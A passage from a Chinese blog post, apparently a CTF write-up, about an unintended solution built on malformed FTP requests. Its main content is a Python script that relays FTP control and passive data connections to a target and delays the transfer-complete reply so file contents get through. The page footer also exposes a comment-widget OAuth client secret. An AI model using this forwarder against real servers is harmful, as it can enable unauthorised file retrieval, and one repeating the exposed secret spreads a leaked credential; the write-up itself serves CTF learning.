<p>因为要做端口转发免不了会使用socket，而socket是无法获取到确认信息的，只能够能得到文本内容的数据信息，也就是说转发的内容中是不会有确认信息，由上边的 <strong>wireshark</strong> 简单的分析发现，一旦服务端成功的发送了传输完成信息（226），第二次握手建立的连接就会挥手（也就是说文件内容传输就会中止），可是服务端发送传输完成信息（226）和第二次握手建立的连接的传输却是并行的，现在又无法转发确认信息，于是就有可能出现传输未完成而整个连接中断的情况；</p>
<p>该如何在保证所有传输完成后再中断是一个比较重要的问题了，不过其实吧，这实际上如果说硬要这么去做的话，可以做一个逆推算；</p>
<ul>
<li>=&gt; 等传输真正完成后再停止 =&gt;</li>
<li>=&gt; 第一次握手建立的连接必须得在传输完成后再向客户端发送完成信息 =&gt;</li>
<li>=&gt; 将第一次握手建立的连接和第二次握手建立的连接的并行状态改变为串行 =&gt;</li>
<li>=&gt; 在确认信息完全传输完成前拒绝接收（或者接收了但不转发）信息完成的信息，直到确认真正传输完成后再放行；</li>
</ul>
<p>这里就直接上转发脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket,threading,re,sys</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line"></span><br><span class="line"><span class="comment"># 转发端口，ftp端口</span></span><br><span class="line"></span><br><span class="line">ftp_server = &#123;</span><br><span class="line">    <span class="string">&#x27;ip&#x27;</span>:<span class="string">&#x27;111.111.111.111&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;port&#x27;</span>:<span class="number">2333</span></span><br><span class="line">&#125;</span><br><span class="line">server = &#123;</span><br><span class="line">    <span class="string">&#x27;ip&#x27;</span>:<span class="string">&#x27;222.222.222.222&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;port&#x27;</span>:<span class="number">2334</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 被动端口</span></span><br><span class="line">passive_port = <span class="number">0</span></span><br><span class="line"><span class="comment"># 客户端数据</span></span><br><span class="line">client_status = [<span class="literal">None</span>,<span class="literal">None</span>]</span><br><span class="line"></span><br><span class="line">Step = <span class="number">0</span></span><br><span class="line">Finish = <span class="literal">False</span></span><br><span class="line">socket_1_send = [ <span class="string">&quot;&quot;</span> , <span class="literal">False</span> ]</span><br><span class="line">socket_1_return = [ <span class="string">&quot;&quot;</span> , <span class="literal">False</span> ]</span><br><span class="line"></span><br><span class="line">socket_2_send = [ <span class="string">&quot;&quot;</span> , <span class="literal">False</span> ]</span><br><span class="line">socket_2_return = [ <span class="string">b&quot;&quot;</span> , <span class="literal">False</span> ]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_connect_main</span>():</span></span><br><span class="line">    <span class="keyword">global</span> s1, client_status,Step,passive_port</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        client, host = s1.accept()</span><br><span class="line">        <span class="comment"># 判断是否为第1次请求</span></span><br><span class="line">        <span class="keyword">if</span>(client_status[<span class="number">1</span>] == <span class="literal">None</span>):</span><br><span class="line">            client_status[<span class="number">0</span>], client_status[<span class="number">1</span>] = client, host</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&lt; 1 &gt; &quot;</span>,host)</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 处理&lt;1&gt;客户端请求</span></span><br><span class="line">            accept_client_1 = threading.Thread(target = func_client_1_accept, kwargs = &#123; <span class="string">&#x27;client&#x27;</span>: client &#125;)</span><br><span class="line">            return_client_1 = threading.Thread(target = func_client_1_return, kwargs = &#123; <span class="string">&#x27;client&#x27;</span>: client &#125;)</span><br><span class="line">            accept_client_1.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line">            return_client_1.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line">            accept_client_1.start( )</span><br><span class="line">            return_client_1.start( )</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line"></span><br><span class="line">            client_2, host_2 = client, host</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&lt; 2 &gt;&quot;</span>,host_2)</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 处理&lt;2&gt;客户端请求</span></span><br><span class="line">            accept_client_2 = threading.Thread(target = func_client_2_accept, kwargs = &#123; <span class="string">&#x27;client&#x27;</span>: client_2 &#125;)</span><br><span class="line">            return_client_2 = threading.Thread(target = func_client_2_return, kwargs = &#123; <span class="string">&#x27;client&#x27;</span>: client_2 &#125;)</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 开启线程处理被动端口的交互过程（进入请求文件状态）</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&lt; 2 &gt;&quot;</span>,(ftp_server[<span class="string">&#x27;ip&#x27;</span>],passive_port))</span><br><span class="line">            s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">            s3.connect((ftp_server[<span class="string">&#x27;ip&#x27;</span>], passive_port))</span><br><span class="line"></span><br><span class="line">            accept_ftp_2 = threading.Thread(target = func_ftp_2_accept, kwargs = &#123; <span class="string">&#x27;socket_&#x27;</span>: s3 &#125;)</span><br><span class="line">            send_ftp_2 = threading.Thread(target = func_ftp_2_send, kwargs = &#123; <span class="string">&#x27;socket_&#x27;</span>: s3&#125;)</span><br><span class="line"></span><br><span class="line">            accept_client_2.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line">            return_client_2.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line">            accept_ftp_2.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line">            send_ftp_2.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">            accept_client_2.start( )</span><br><span class="line">            return_client_2.start( )</span><br><span class="line">            accept_ftp_2.start( )</span><br><span class="line">            send_ftp_2.start( )</span><br><span class="line"></span><br><span class="line">            Step += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;1&gt; 接收户端发来的信息</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_client_1_accept</span>(<span class="params">client</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_1_send</span><br><span class="line">    get_content = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        get_content += client.recv(<span class="number">2048</span>).decode(<span class="string">&#x27;gbk&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span>(get_content.endswith(<span class="string">&quot;\x0d\x0a&quot;</span>)):</span><br><span class="line">            socket_1_send = [ get_content ,<span class="literal">True</span>]</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&lt; 1 &gt;&quot;</span>,socket_1_send)</span><br><span class="line">            get_content = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;1&gt; 将从ftp服务器的信息转发到客户端</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_client_1_return</span>(<span class="params">client</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_1_return</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">if</span> (socket_1_return[ <span class="number">1</span> ]):</span><br><span class="line">            client.send(socket_1_return[ <span class="number">0</span> ].encode(<span class="string">&#x27;gbk&#x27;</span>))</span><br><span class="line">            socket_1_return = [ <span class="string">&quot;&quot;</span>, <span class="literal">False</span> ]</span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;1&gt; 将客户端发来的信息转发到ftp服务器</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_ftp_1_send</span>(<span class="params">socket_</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_1_send</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">if</span> (socket_1_send[ <span class="number">1</span> ]):</span><br><span class="line">            socket_.send(socket_1_send[ <span class="number">0</span> ].encode(<span class="string">&#x27;gbk&#x27;</span>))</span><br><span class="line">            socket_1_send = [ <span class="string">&quot;&quot;</span>, <span class="literal">False</span> ]</span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;1&gt; 获取从ftp服务器得到的信息</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_ftp_1_accept</span>(<span class="params">socket_</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_1_return,passive_port,Step,Finish</span><br><span class="line">    get_content = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        get_content += socket_.recv(<span class="number">2048</span>).decode(<span class="string">&#x27;gbk&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span>(get_content.endswith(<span class="string">&quot;\x0d\x0a&quot;</span>)):</span><br><span class="line">            socket_1_return = [get_content, <span class="literal">True</span>]</span><br><span class="line">            <span class="comment"># 截取ftp开启的被动端口</span></span><br><span class="line">            <span class="keyword">if</span> (re.match(<span class="string">&quot;.*\(\|\|\|(\d.*)\|\)&quot;</span>, get_content)):</span><br><span class="line">                passive_port = <span class="built_in">int</span>(re.search(<span class="string">&quot;\(\|\|\|(\d.*)\|\)&quot;</span>, get_content).group(<span class="number">1</span>))</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&lt; 1 &gt;&quot;</span>, socket_1_return)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span>(get_content.split(<span class="string">&quot; &quot;</span>)[<span class="number">0</span>] == <span class="string">&#x27;150&#x27;</span>):</span><br><span class="line">                <span class="keyword">while</span> (Step &lt; <span class="number">3</span>):</span><br><span class="line">                    <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">            <span class="comment"># 由于ftp一旦向客户端发送Transfer starting时，当客户端再次连接首次访问端口，整个ftp交互就会关闭</span></span><br><span class="line">            <span class="comment"># 这里得对文件传输状态进行阻塞</span></span><br><span class="line">            <span class="comment"># 状态得到传输完成的信号，则取消阻塞</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="string">&quot;Transfer complete&quot;</span> <span class="keyword">in</span> get_content):</span><br><span class="line">                Finish = <span class="literal">True</span></span><br><span class="line">            get_content = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;2&gt;接收客户端发来的信息（passive）</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_client_2_accept</span>(<span class="params">client</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_2_send</span><br><span class="line">    get_content = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        get_content += client.recv(<span class="number">2048</span>).decode(<span class="string">&#x27;gbk&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span>(get_content.endswith(<span class="string">&quot;\x0d\x0a&quot;</span>)):</span><br><span class="line">            socket_2_send = [get_content, <span class="literal">True</span>]</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&lt; 2 &gt;&quot;</span>,socket_2_send)</span><br><span class="line">            get_content = <span class="string">&quot;&quot;</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(get_content)</span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;2&gt;将从ftp服务器接收到的信息转回客户端（passive）</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_client_2_return</span>(<span class="params">client</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_2_return,Step</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">if</span>(socket_2_return[ <span class="number">1</span> ]):</span><br><span class="line">            client.send(socket_2_return[<span class="number">0</span>])</span><br><span class="line">            socket_2_return = [<span class="string">b&quot;&quot;</span>,<span class="literal">False</span>]</span><br><span class="line">            Step += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># &lt;2&gt;使用开启的被动端口与ftp服务器进行交互（passive）</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_ftp_2_send</span>(<span class="params">socket_</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_2_send</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">if</span>(socket_2_send[ <span class="number">1</span> ]):</span><br><span class="line">            socket_.send(socket_2_send[ <span class="number">0</span> ].encode(<span class="string">&#x27;gbk&#x27;</span>))</span><br><span class="line">            socket_2_send = [ <span class="string">&quot;&quot;</span> ,<span class="literal">False</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">func_ftp_2_accept</span>(<span class="params">socket_</span>):</span></span><br><span class="line">    <span class="keyword">global</span> socket_2_return,Step</span><br><span class="line">    get_content = <span class="string">b&quot;&quot;</span></span><br><span class="line">    cmp_content = <span class="string">b&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        get_content += socket_.recv(<span class="number">65535</span>)</span><br><span class="line">        <span class="keyword">if</span>(get_content == cmp_content <span class="keyword">and</span> get_content != <span class="string">b&quot;&quot;</span>):</span><br><span class="line">            socket_2_return = [get_content,<span class="literal">True</span>]</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;&lt; 2 &gt;&quot;</span>,socket_2_return)</span><br><span class="line">            Step += <span class="number">1</span></span><br><span class="line">            get_content = <span class="string">b&quot;&quot;</span></span><br><span class="line">            cmp_content = <span class="string">b&quot;&quot;</span></span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        cmp_content = get_content</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span>():</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">global</span> s1,s2,s3</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 监听转发端口</span></span><br><span class="line">    s1 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line">    s1.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,<span class="number">1</span>)</span><br><span class="line">    s1.bind((<span class="string">&#x27;0.0.0.0&#x27;</span>,server[<span class="string">&#x27;port&#x27;</span>]))</span><br><span class="line">    s1.listen(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 连接ftp服务器</span></span><br><span class="line">    s2 = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line">    s2.connect((ftp_server[<span class="string">&#x27;ip&#x27;</span>],ftp_server[<span class="string">&#x27;port&#x27;</span>]))</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;&lt; 1 &gt; &quot;</span>, (ftp_server[ <span class="string">&#x27;ip&#x27;</span> ], ftp_server[ <span class="string">&#x27;port&#x27;</span> ]))</span><br><span class="line"></span><br><span class="line">    t_connect_main = threading.Thread(target = func_connect_main)</span><br><span class="line"></span><br><span class="line">    accept_ftp_1 = threading.Thread(target = func_ftp_1_accept,kwargs = &#123;<span class="string">&quot;socket_&quot;</span>:s2&#125;)</span><br><span class="line">    send_ftp_1 = threading.Thread(target = func_ftp_1_send, kwargs = &#123; <span class="string">&quot;socket_&quot;</span>: s2 &#125;)</span><br><span class="line"></span><br><span class="line">    t_connect_main.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line">    accept_ftp_1.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line">    send_ftp_1.setDaemon(daemonic = <span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">    t_connect_main.start()</span><br><span class="line">    accept_ftp_1.start()</span><br><span class="line">    send_ftp_1.start()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="keyword">not</span> Finish:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            sleep(<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">            s1.close( )</span><br><span class="line">            s2.close( )</span><br><span class="line">            exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> wait <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>, <span class="number">0</span>, -<span class="number">1</span>):</span><br><span class="line">        sys.stdout.write(<span class="string">&quot;\r````` [ &quot;</span> + <span class="built_in">str</span>(wait) + <span class="string">&quot; ]`````&quot;</span>)</span><br><span class="line">        sys.stdout.flush( )</span><br><span class="line">        sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    s1.close( )</span><br><span class="line">    s2.close( )</span><br><span class="line">    exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<h3 id="演示"><a href="#演示" class="headerlink" title="- 演示 -"></a>- 演示 -</h3><p>行吧，这里就直接演示：</p>
<blockquote>
<p><img src="https://morblogib.oss-cn-shanghai.aliyuncs.com/self/images/save/202112271943491.png" alt="image-20201229203900092.png"></p>
</blockquote>
<p>这里发现是可以成功使用畸形的ftp请求获取到文件内容的了。</p>
<hr>
<h2 id="总结"><a href="#总结" class="headerlink" title="- 总结 -"></a>- 总结 -</h2><p> 老早的题目了，来凑个文章呗，畸形ftp应该是也有不少师傅知道的。</p>


        <hr>
        <!-- Pager -->
        <ul class="pager">
          
          <li class="previous">
            <a href="/2021/12/27/cn/总结 - ctf中flask的ssti(一)/" data-toggle="tooltip" data-placement="top" title="总结 - ctf中flask的ssti(一)">&larr; Previous Post</a>
          </li>
          
          
          <li class="next">
            <a href="/2021/12/27/cn/说明 - zip格式说明/" data-toggle="tooltip" data-placement="top" title="说明 - zip格式说明">Next Post &rarr;</a>
          </li>
          
        </ul>

        
        <!-- tip start -->
        <!-- tip -->
<!-- tip start -->
<div class="tip">
  <p>
    
      如果您喜欢此博客或发现它对您有用，则欢迎对此发表评论。也欢迎您共享此博客，以便更多人可以参与。如果博客中使用的图像侵犯了您的版权，请与作者联系以将其删除。谢谢 ！
    
  </p>
</div>
<!-- tip end -->

        <!-- tip end -->
        

        
        <!-- Sharing Srtart -->
        <!-- Social Social Share Post -->
<!-- Docs:https://github.com/overtrue/share.js -->

<div class="social-share" data-initialized="true" data-disabled="tencent ,douban ,qzone ,linkedin ,facebook ,google ,diandian" data-wechat-qrcode-helper="" align="center">
  <ul class="list-inline text-center social-share-ul">
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-twitter">
        <i class="fa fa-twitter fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a class="social-share-icon icon-wechat">
        <i class="fa fa-weixin fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-weibo">
        <i class="fa fa-weibo fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-qq">
        <i class="fa fa-qq fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon" href="mailto:?subject=非预期 - 畸形ftp请求&body=Hi,I found this website and thought you might like it https://morblog.cc/2021/12/27/cn/非预期 - 畸形ftp请求/">
        <i class="fa fa-envelope fa-1x" aria-hidden="true"></i>
      </a>
    </li>
  </ul>
</div>

<!-- css & js -->
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css"> -->
<script defer="defer" async="true" src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>

        <!-- Sharing End -->
        
        <hr>

        <!-- comments start -->
        <!-- 1. gitalk comment -->

  <!-- gitalk start -->
  <!-- Docs:https://github.com/gitalk/gitalk/blob/master/readme-cn.md -->

  <div id="gitalk-container"></div>

  
    <!-- <script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.js"></script> -->
    <script src="/js/comment/gitalk.js"></script>
  

  <script>
    var gitalk = new Gitalk({
      clientID: '1312dc4ff4d6834bb0f6',
      clientSecret: '07aa0dc79f38ac6fafea3914a40558f250e7cfb4',
      repo: 'morcomment',
      owner: 'morouu',
      admin: 'morouu',
      id: 'Mon Dec 27 2021 17:15:26 GMT+0800', // Ensure uniqueness and length less than 50
      distractionFreeMode: false, // Facebook-like distraction free mode
      perPage: 10,
      pagerDirection: 'last',
      createIssueManually: false,
      language: '',
      proxy: ''
    });
    gitalk.render('gitalk-container');

    var gtFolded = () => {
      setTimeout(function () {
        let markdownBody = document.getElementsByClassName("markdown-body");
        let list = Array.from(markdownBody);
        list.forEach(item => {
          if (item.clientHeight > 250) {
            item.classList.add('gt-comment-body-folded');
            item.style.maxHeight = 'px';
            item.title = 'Click to Expand';
            item.onclick = function () {
              item.classList.remove('gt-comment-body-folded');
              item.style.maxHeight = '';
              item.title = '';
              item.onclick = null;
            };
          }
        })
      }, 800);
    }
  </script>

  <!-- gitalk end -->


<!-- 2. gitment comment -->


<!-- 3. disqus comment -->


        <!-- comments end -->
        <hr>

      </div>

      <!-- Catalog: Tabe of Content -->
      <!-- Table of Contents -->

    
      <aside id="sidebar">
        <div id="toc" class="toc-article">
        <strong class="toc-title">目录</strong>
        
          <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F-%E7%95%B8%E5%BD%A2ftp%E8%AF%B7%E6%B1%82"><span class="toc-nav-number">1.</span> <span class="toc-nav-text">非预期 - 畸形ftp请求</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-nav-number">1.1.</span> <span class="toc-nav-text">- 前言 -</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-nav-number">1.2.</span> <span class="toc-nav-text">- 正文 -</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#%E5%8E%9F%E9%A2%98"><span class="toc-nav-number">1.2.1.</span> <span class="toc-nav-text">- 原题 -</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#%E5%88%86%E6%9E%90"><span class="toc-nav-number">1.2.2.</span> <span class="toc-nav-text">- 分析 -</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#%E7%BB%93%E8%AE%BA"><span class="toc-nav-number">1.2.3.</span> <span class="toc-nav-text">- 结论 -</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#%E6%BC%94%E7%A4%BA"><span class="toc-nav-number">1.2.4.</span> <span class="toc-nav-text">- 演示 -</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-nav-number">1.3.</span> <span class="toc-nav-text">- 总结 -</span></a></li></ol></li></ol>
        
        </div>
      </aside>
    



      <!-- Sidebar Container -->
      <div class="
                col-lg-8 col-lg-offset-1
                col-md-10 col-md-offset-1
                sidebar-container">

        <!-- Featured Tags -->
        
        <section>
          <!-- no hr -->
          <h5>
            <a href="/tags/">标签</a>
          </h5>
          <div class="tags">
            
            <a class="tag" href="/tags/#安全" title="安全">安全</a>
            
            <a class="tag" href="/tags/#WEB" title="WEB">WEB</a>
            
            <a class="tag" href="/tags/#ctf" title="ctf">ctf</a>
            
            <a class="tag" href="/tags/#trick" title="trick">trick</a>
            
          </div>
        </section>
        

        <!-- Friends Blog -->
        
        <hr>
        <h5>朋友们</h5>
        <ul class="list-inline">

          
          <li>
            <a href="https://www.cnblogs.com/Yhck/" target="_blank">Yhck</a>
          </li>
          
          <li>
            <a href="https://www.cnblogs.com/wkzb/" target="_blank">beiwo</a>
          </li>
          
          <li>
            <a href="https://leohearts.com/" target="_blank">Leohearts</a>
          </li>
          
          <li>
            <a href="https://longlone.best/" target="_blank">Longlone</a>
          </li>
          
          <li>
            <a href="http://na0hblog.top/" target="_blank">Na0h</a>
          </li>
          
        </ul>
        
      </div>
    </div>
  </div>
</article>



<!-- anchorjs start -->
<!-- async load function -->
<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
<script type="text/javascript">
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function(e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  };
</script>
<script type="text/javascript">
  //anchor-js, Doc:http://bryanbraun.github.io/anchorjs/
  async ("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js", function() {
    anchors.options = {
      visible: 'hover',
      placement: 'left',
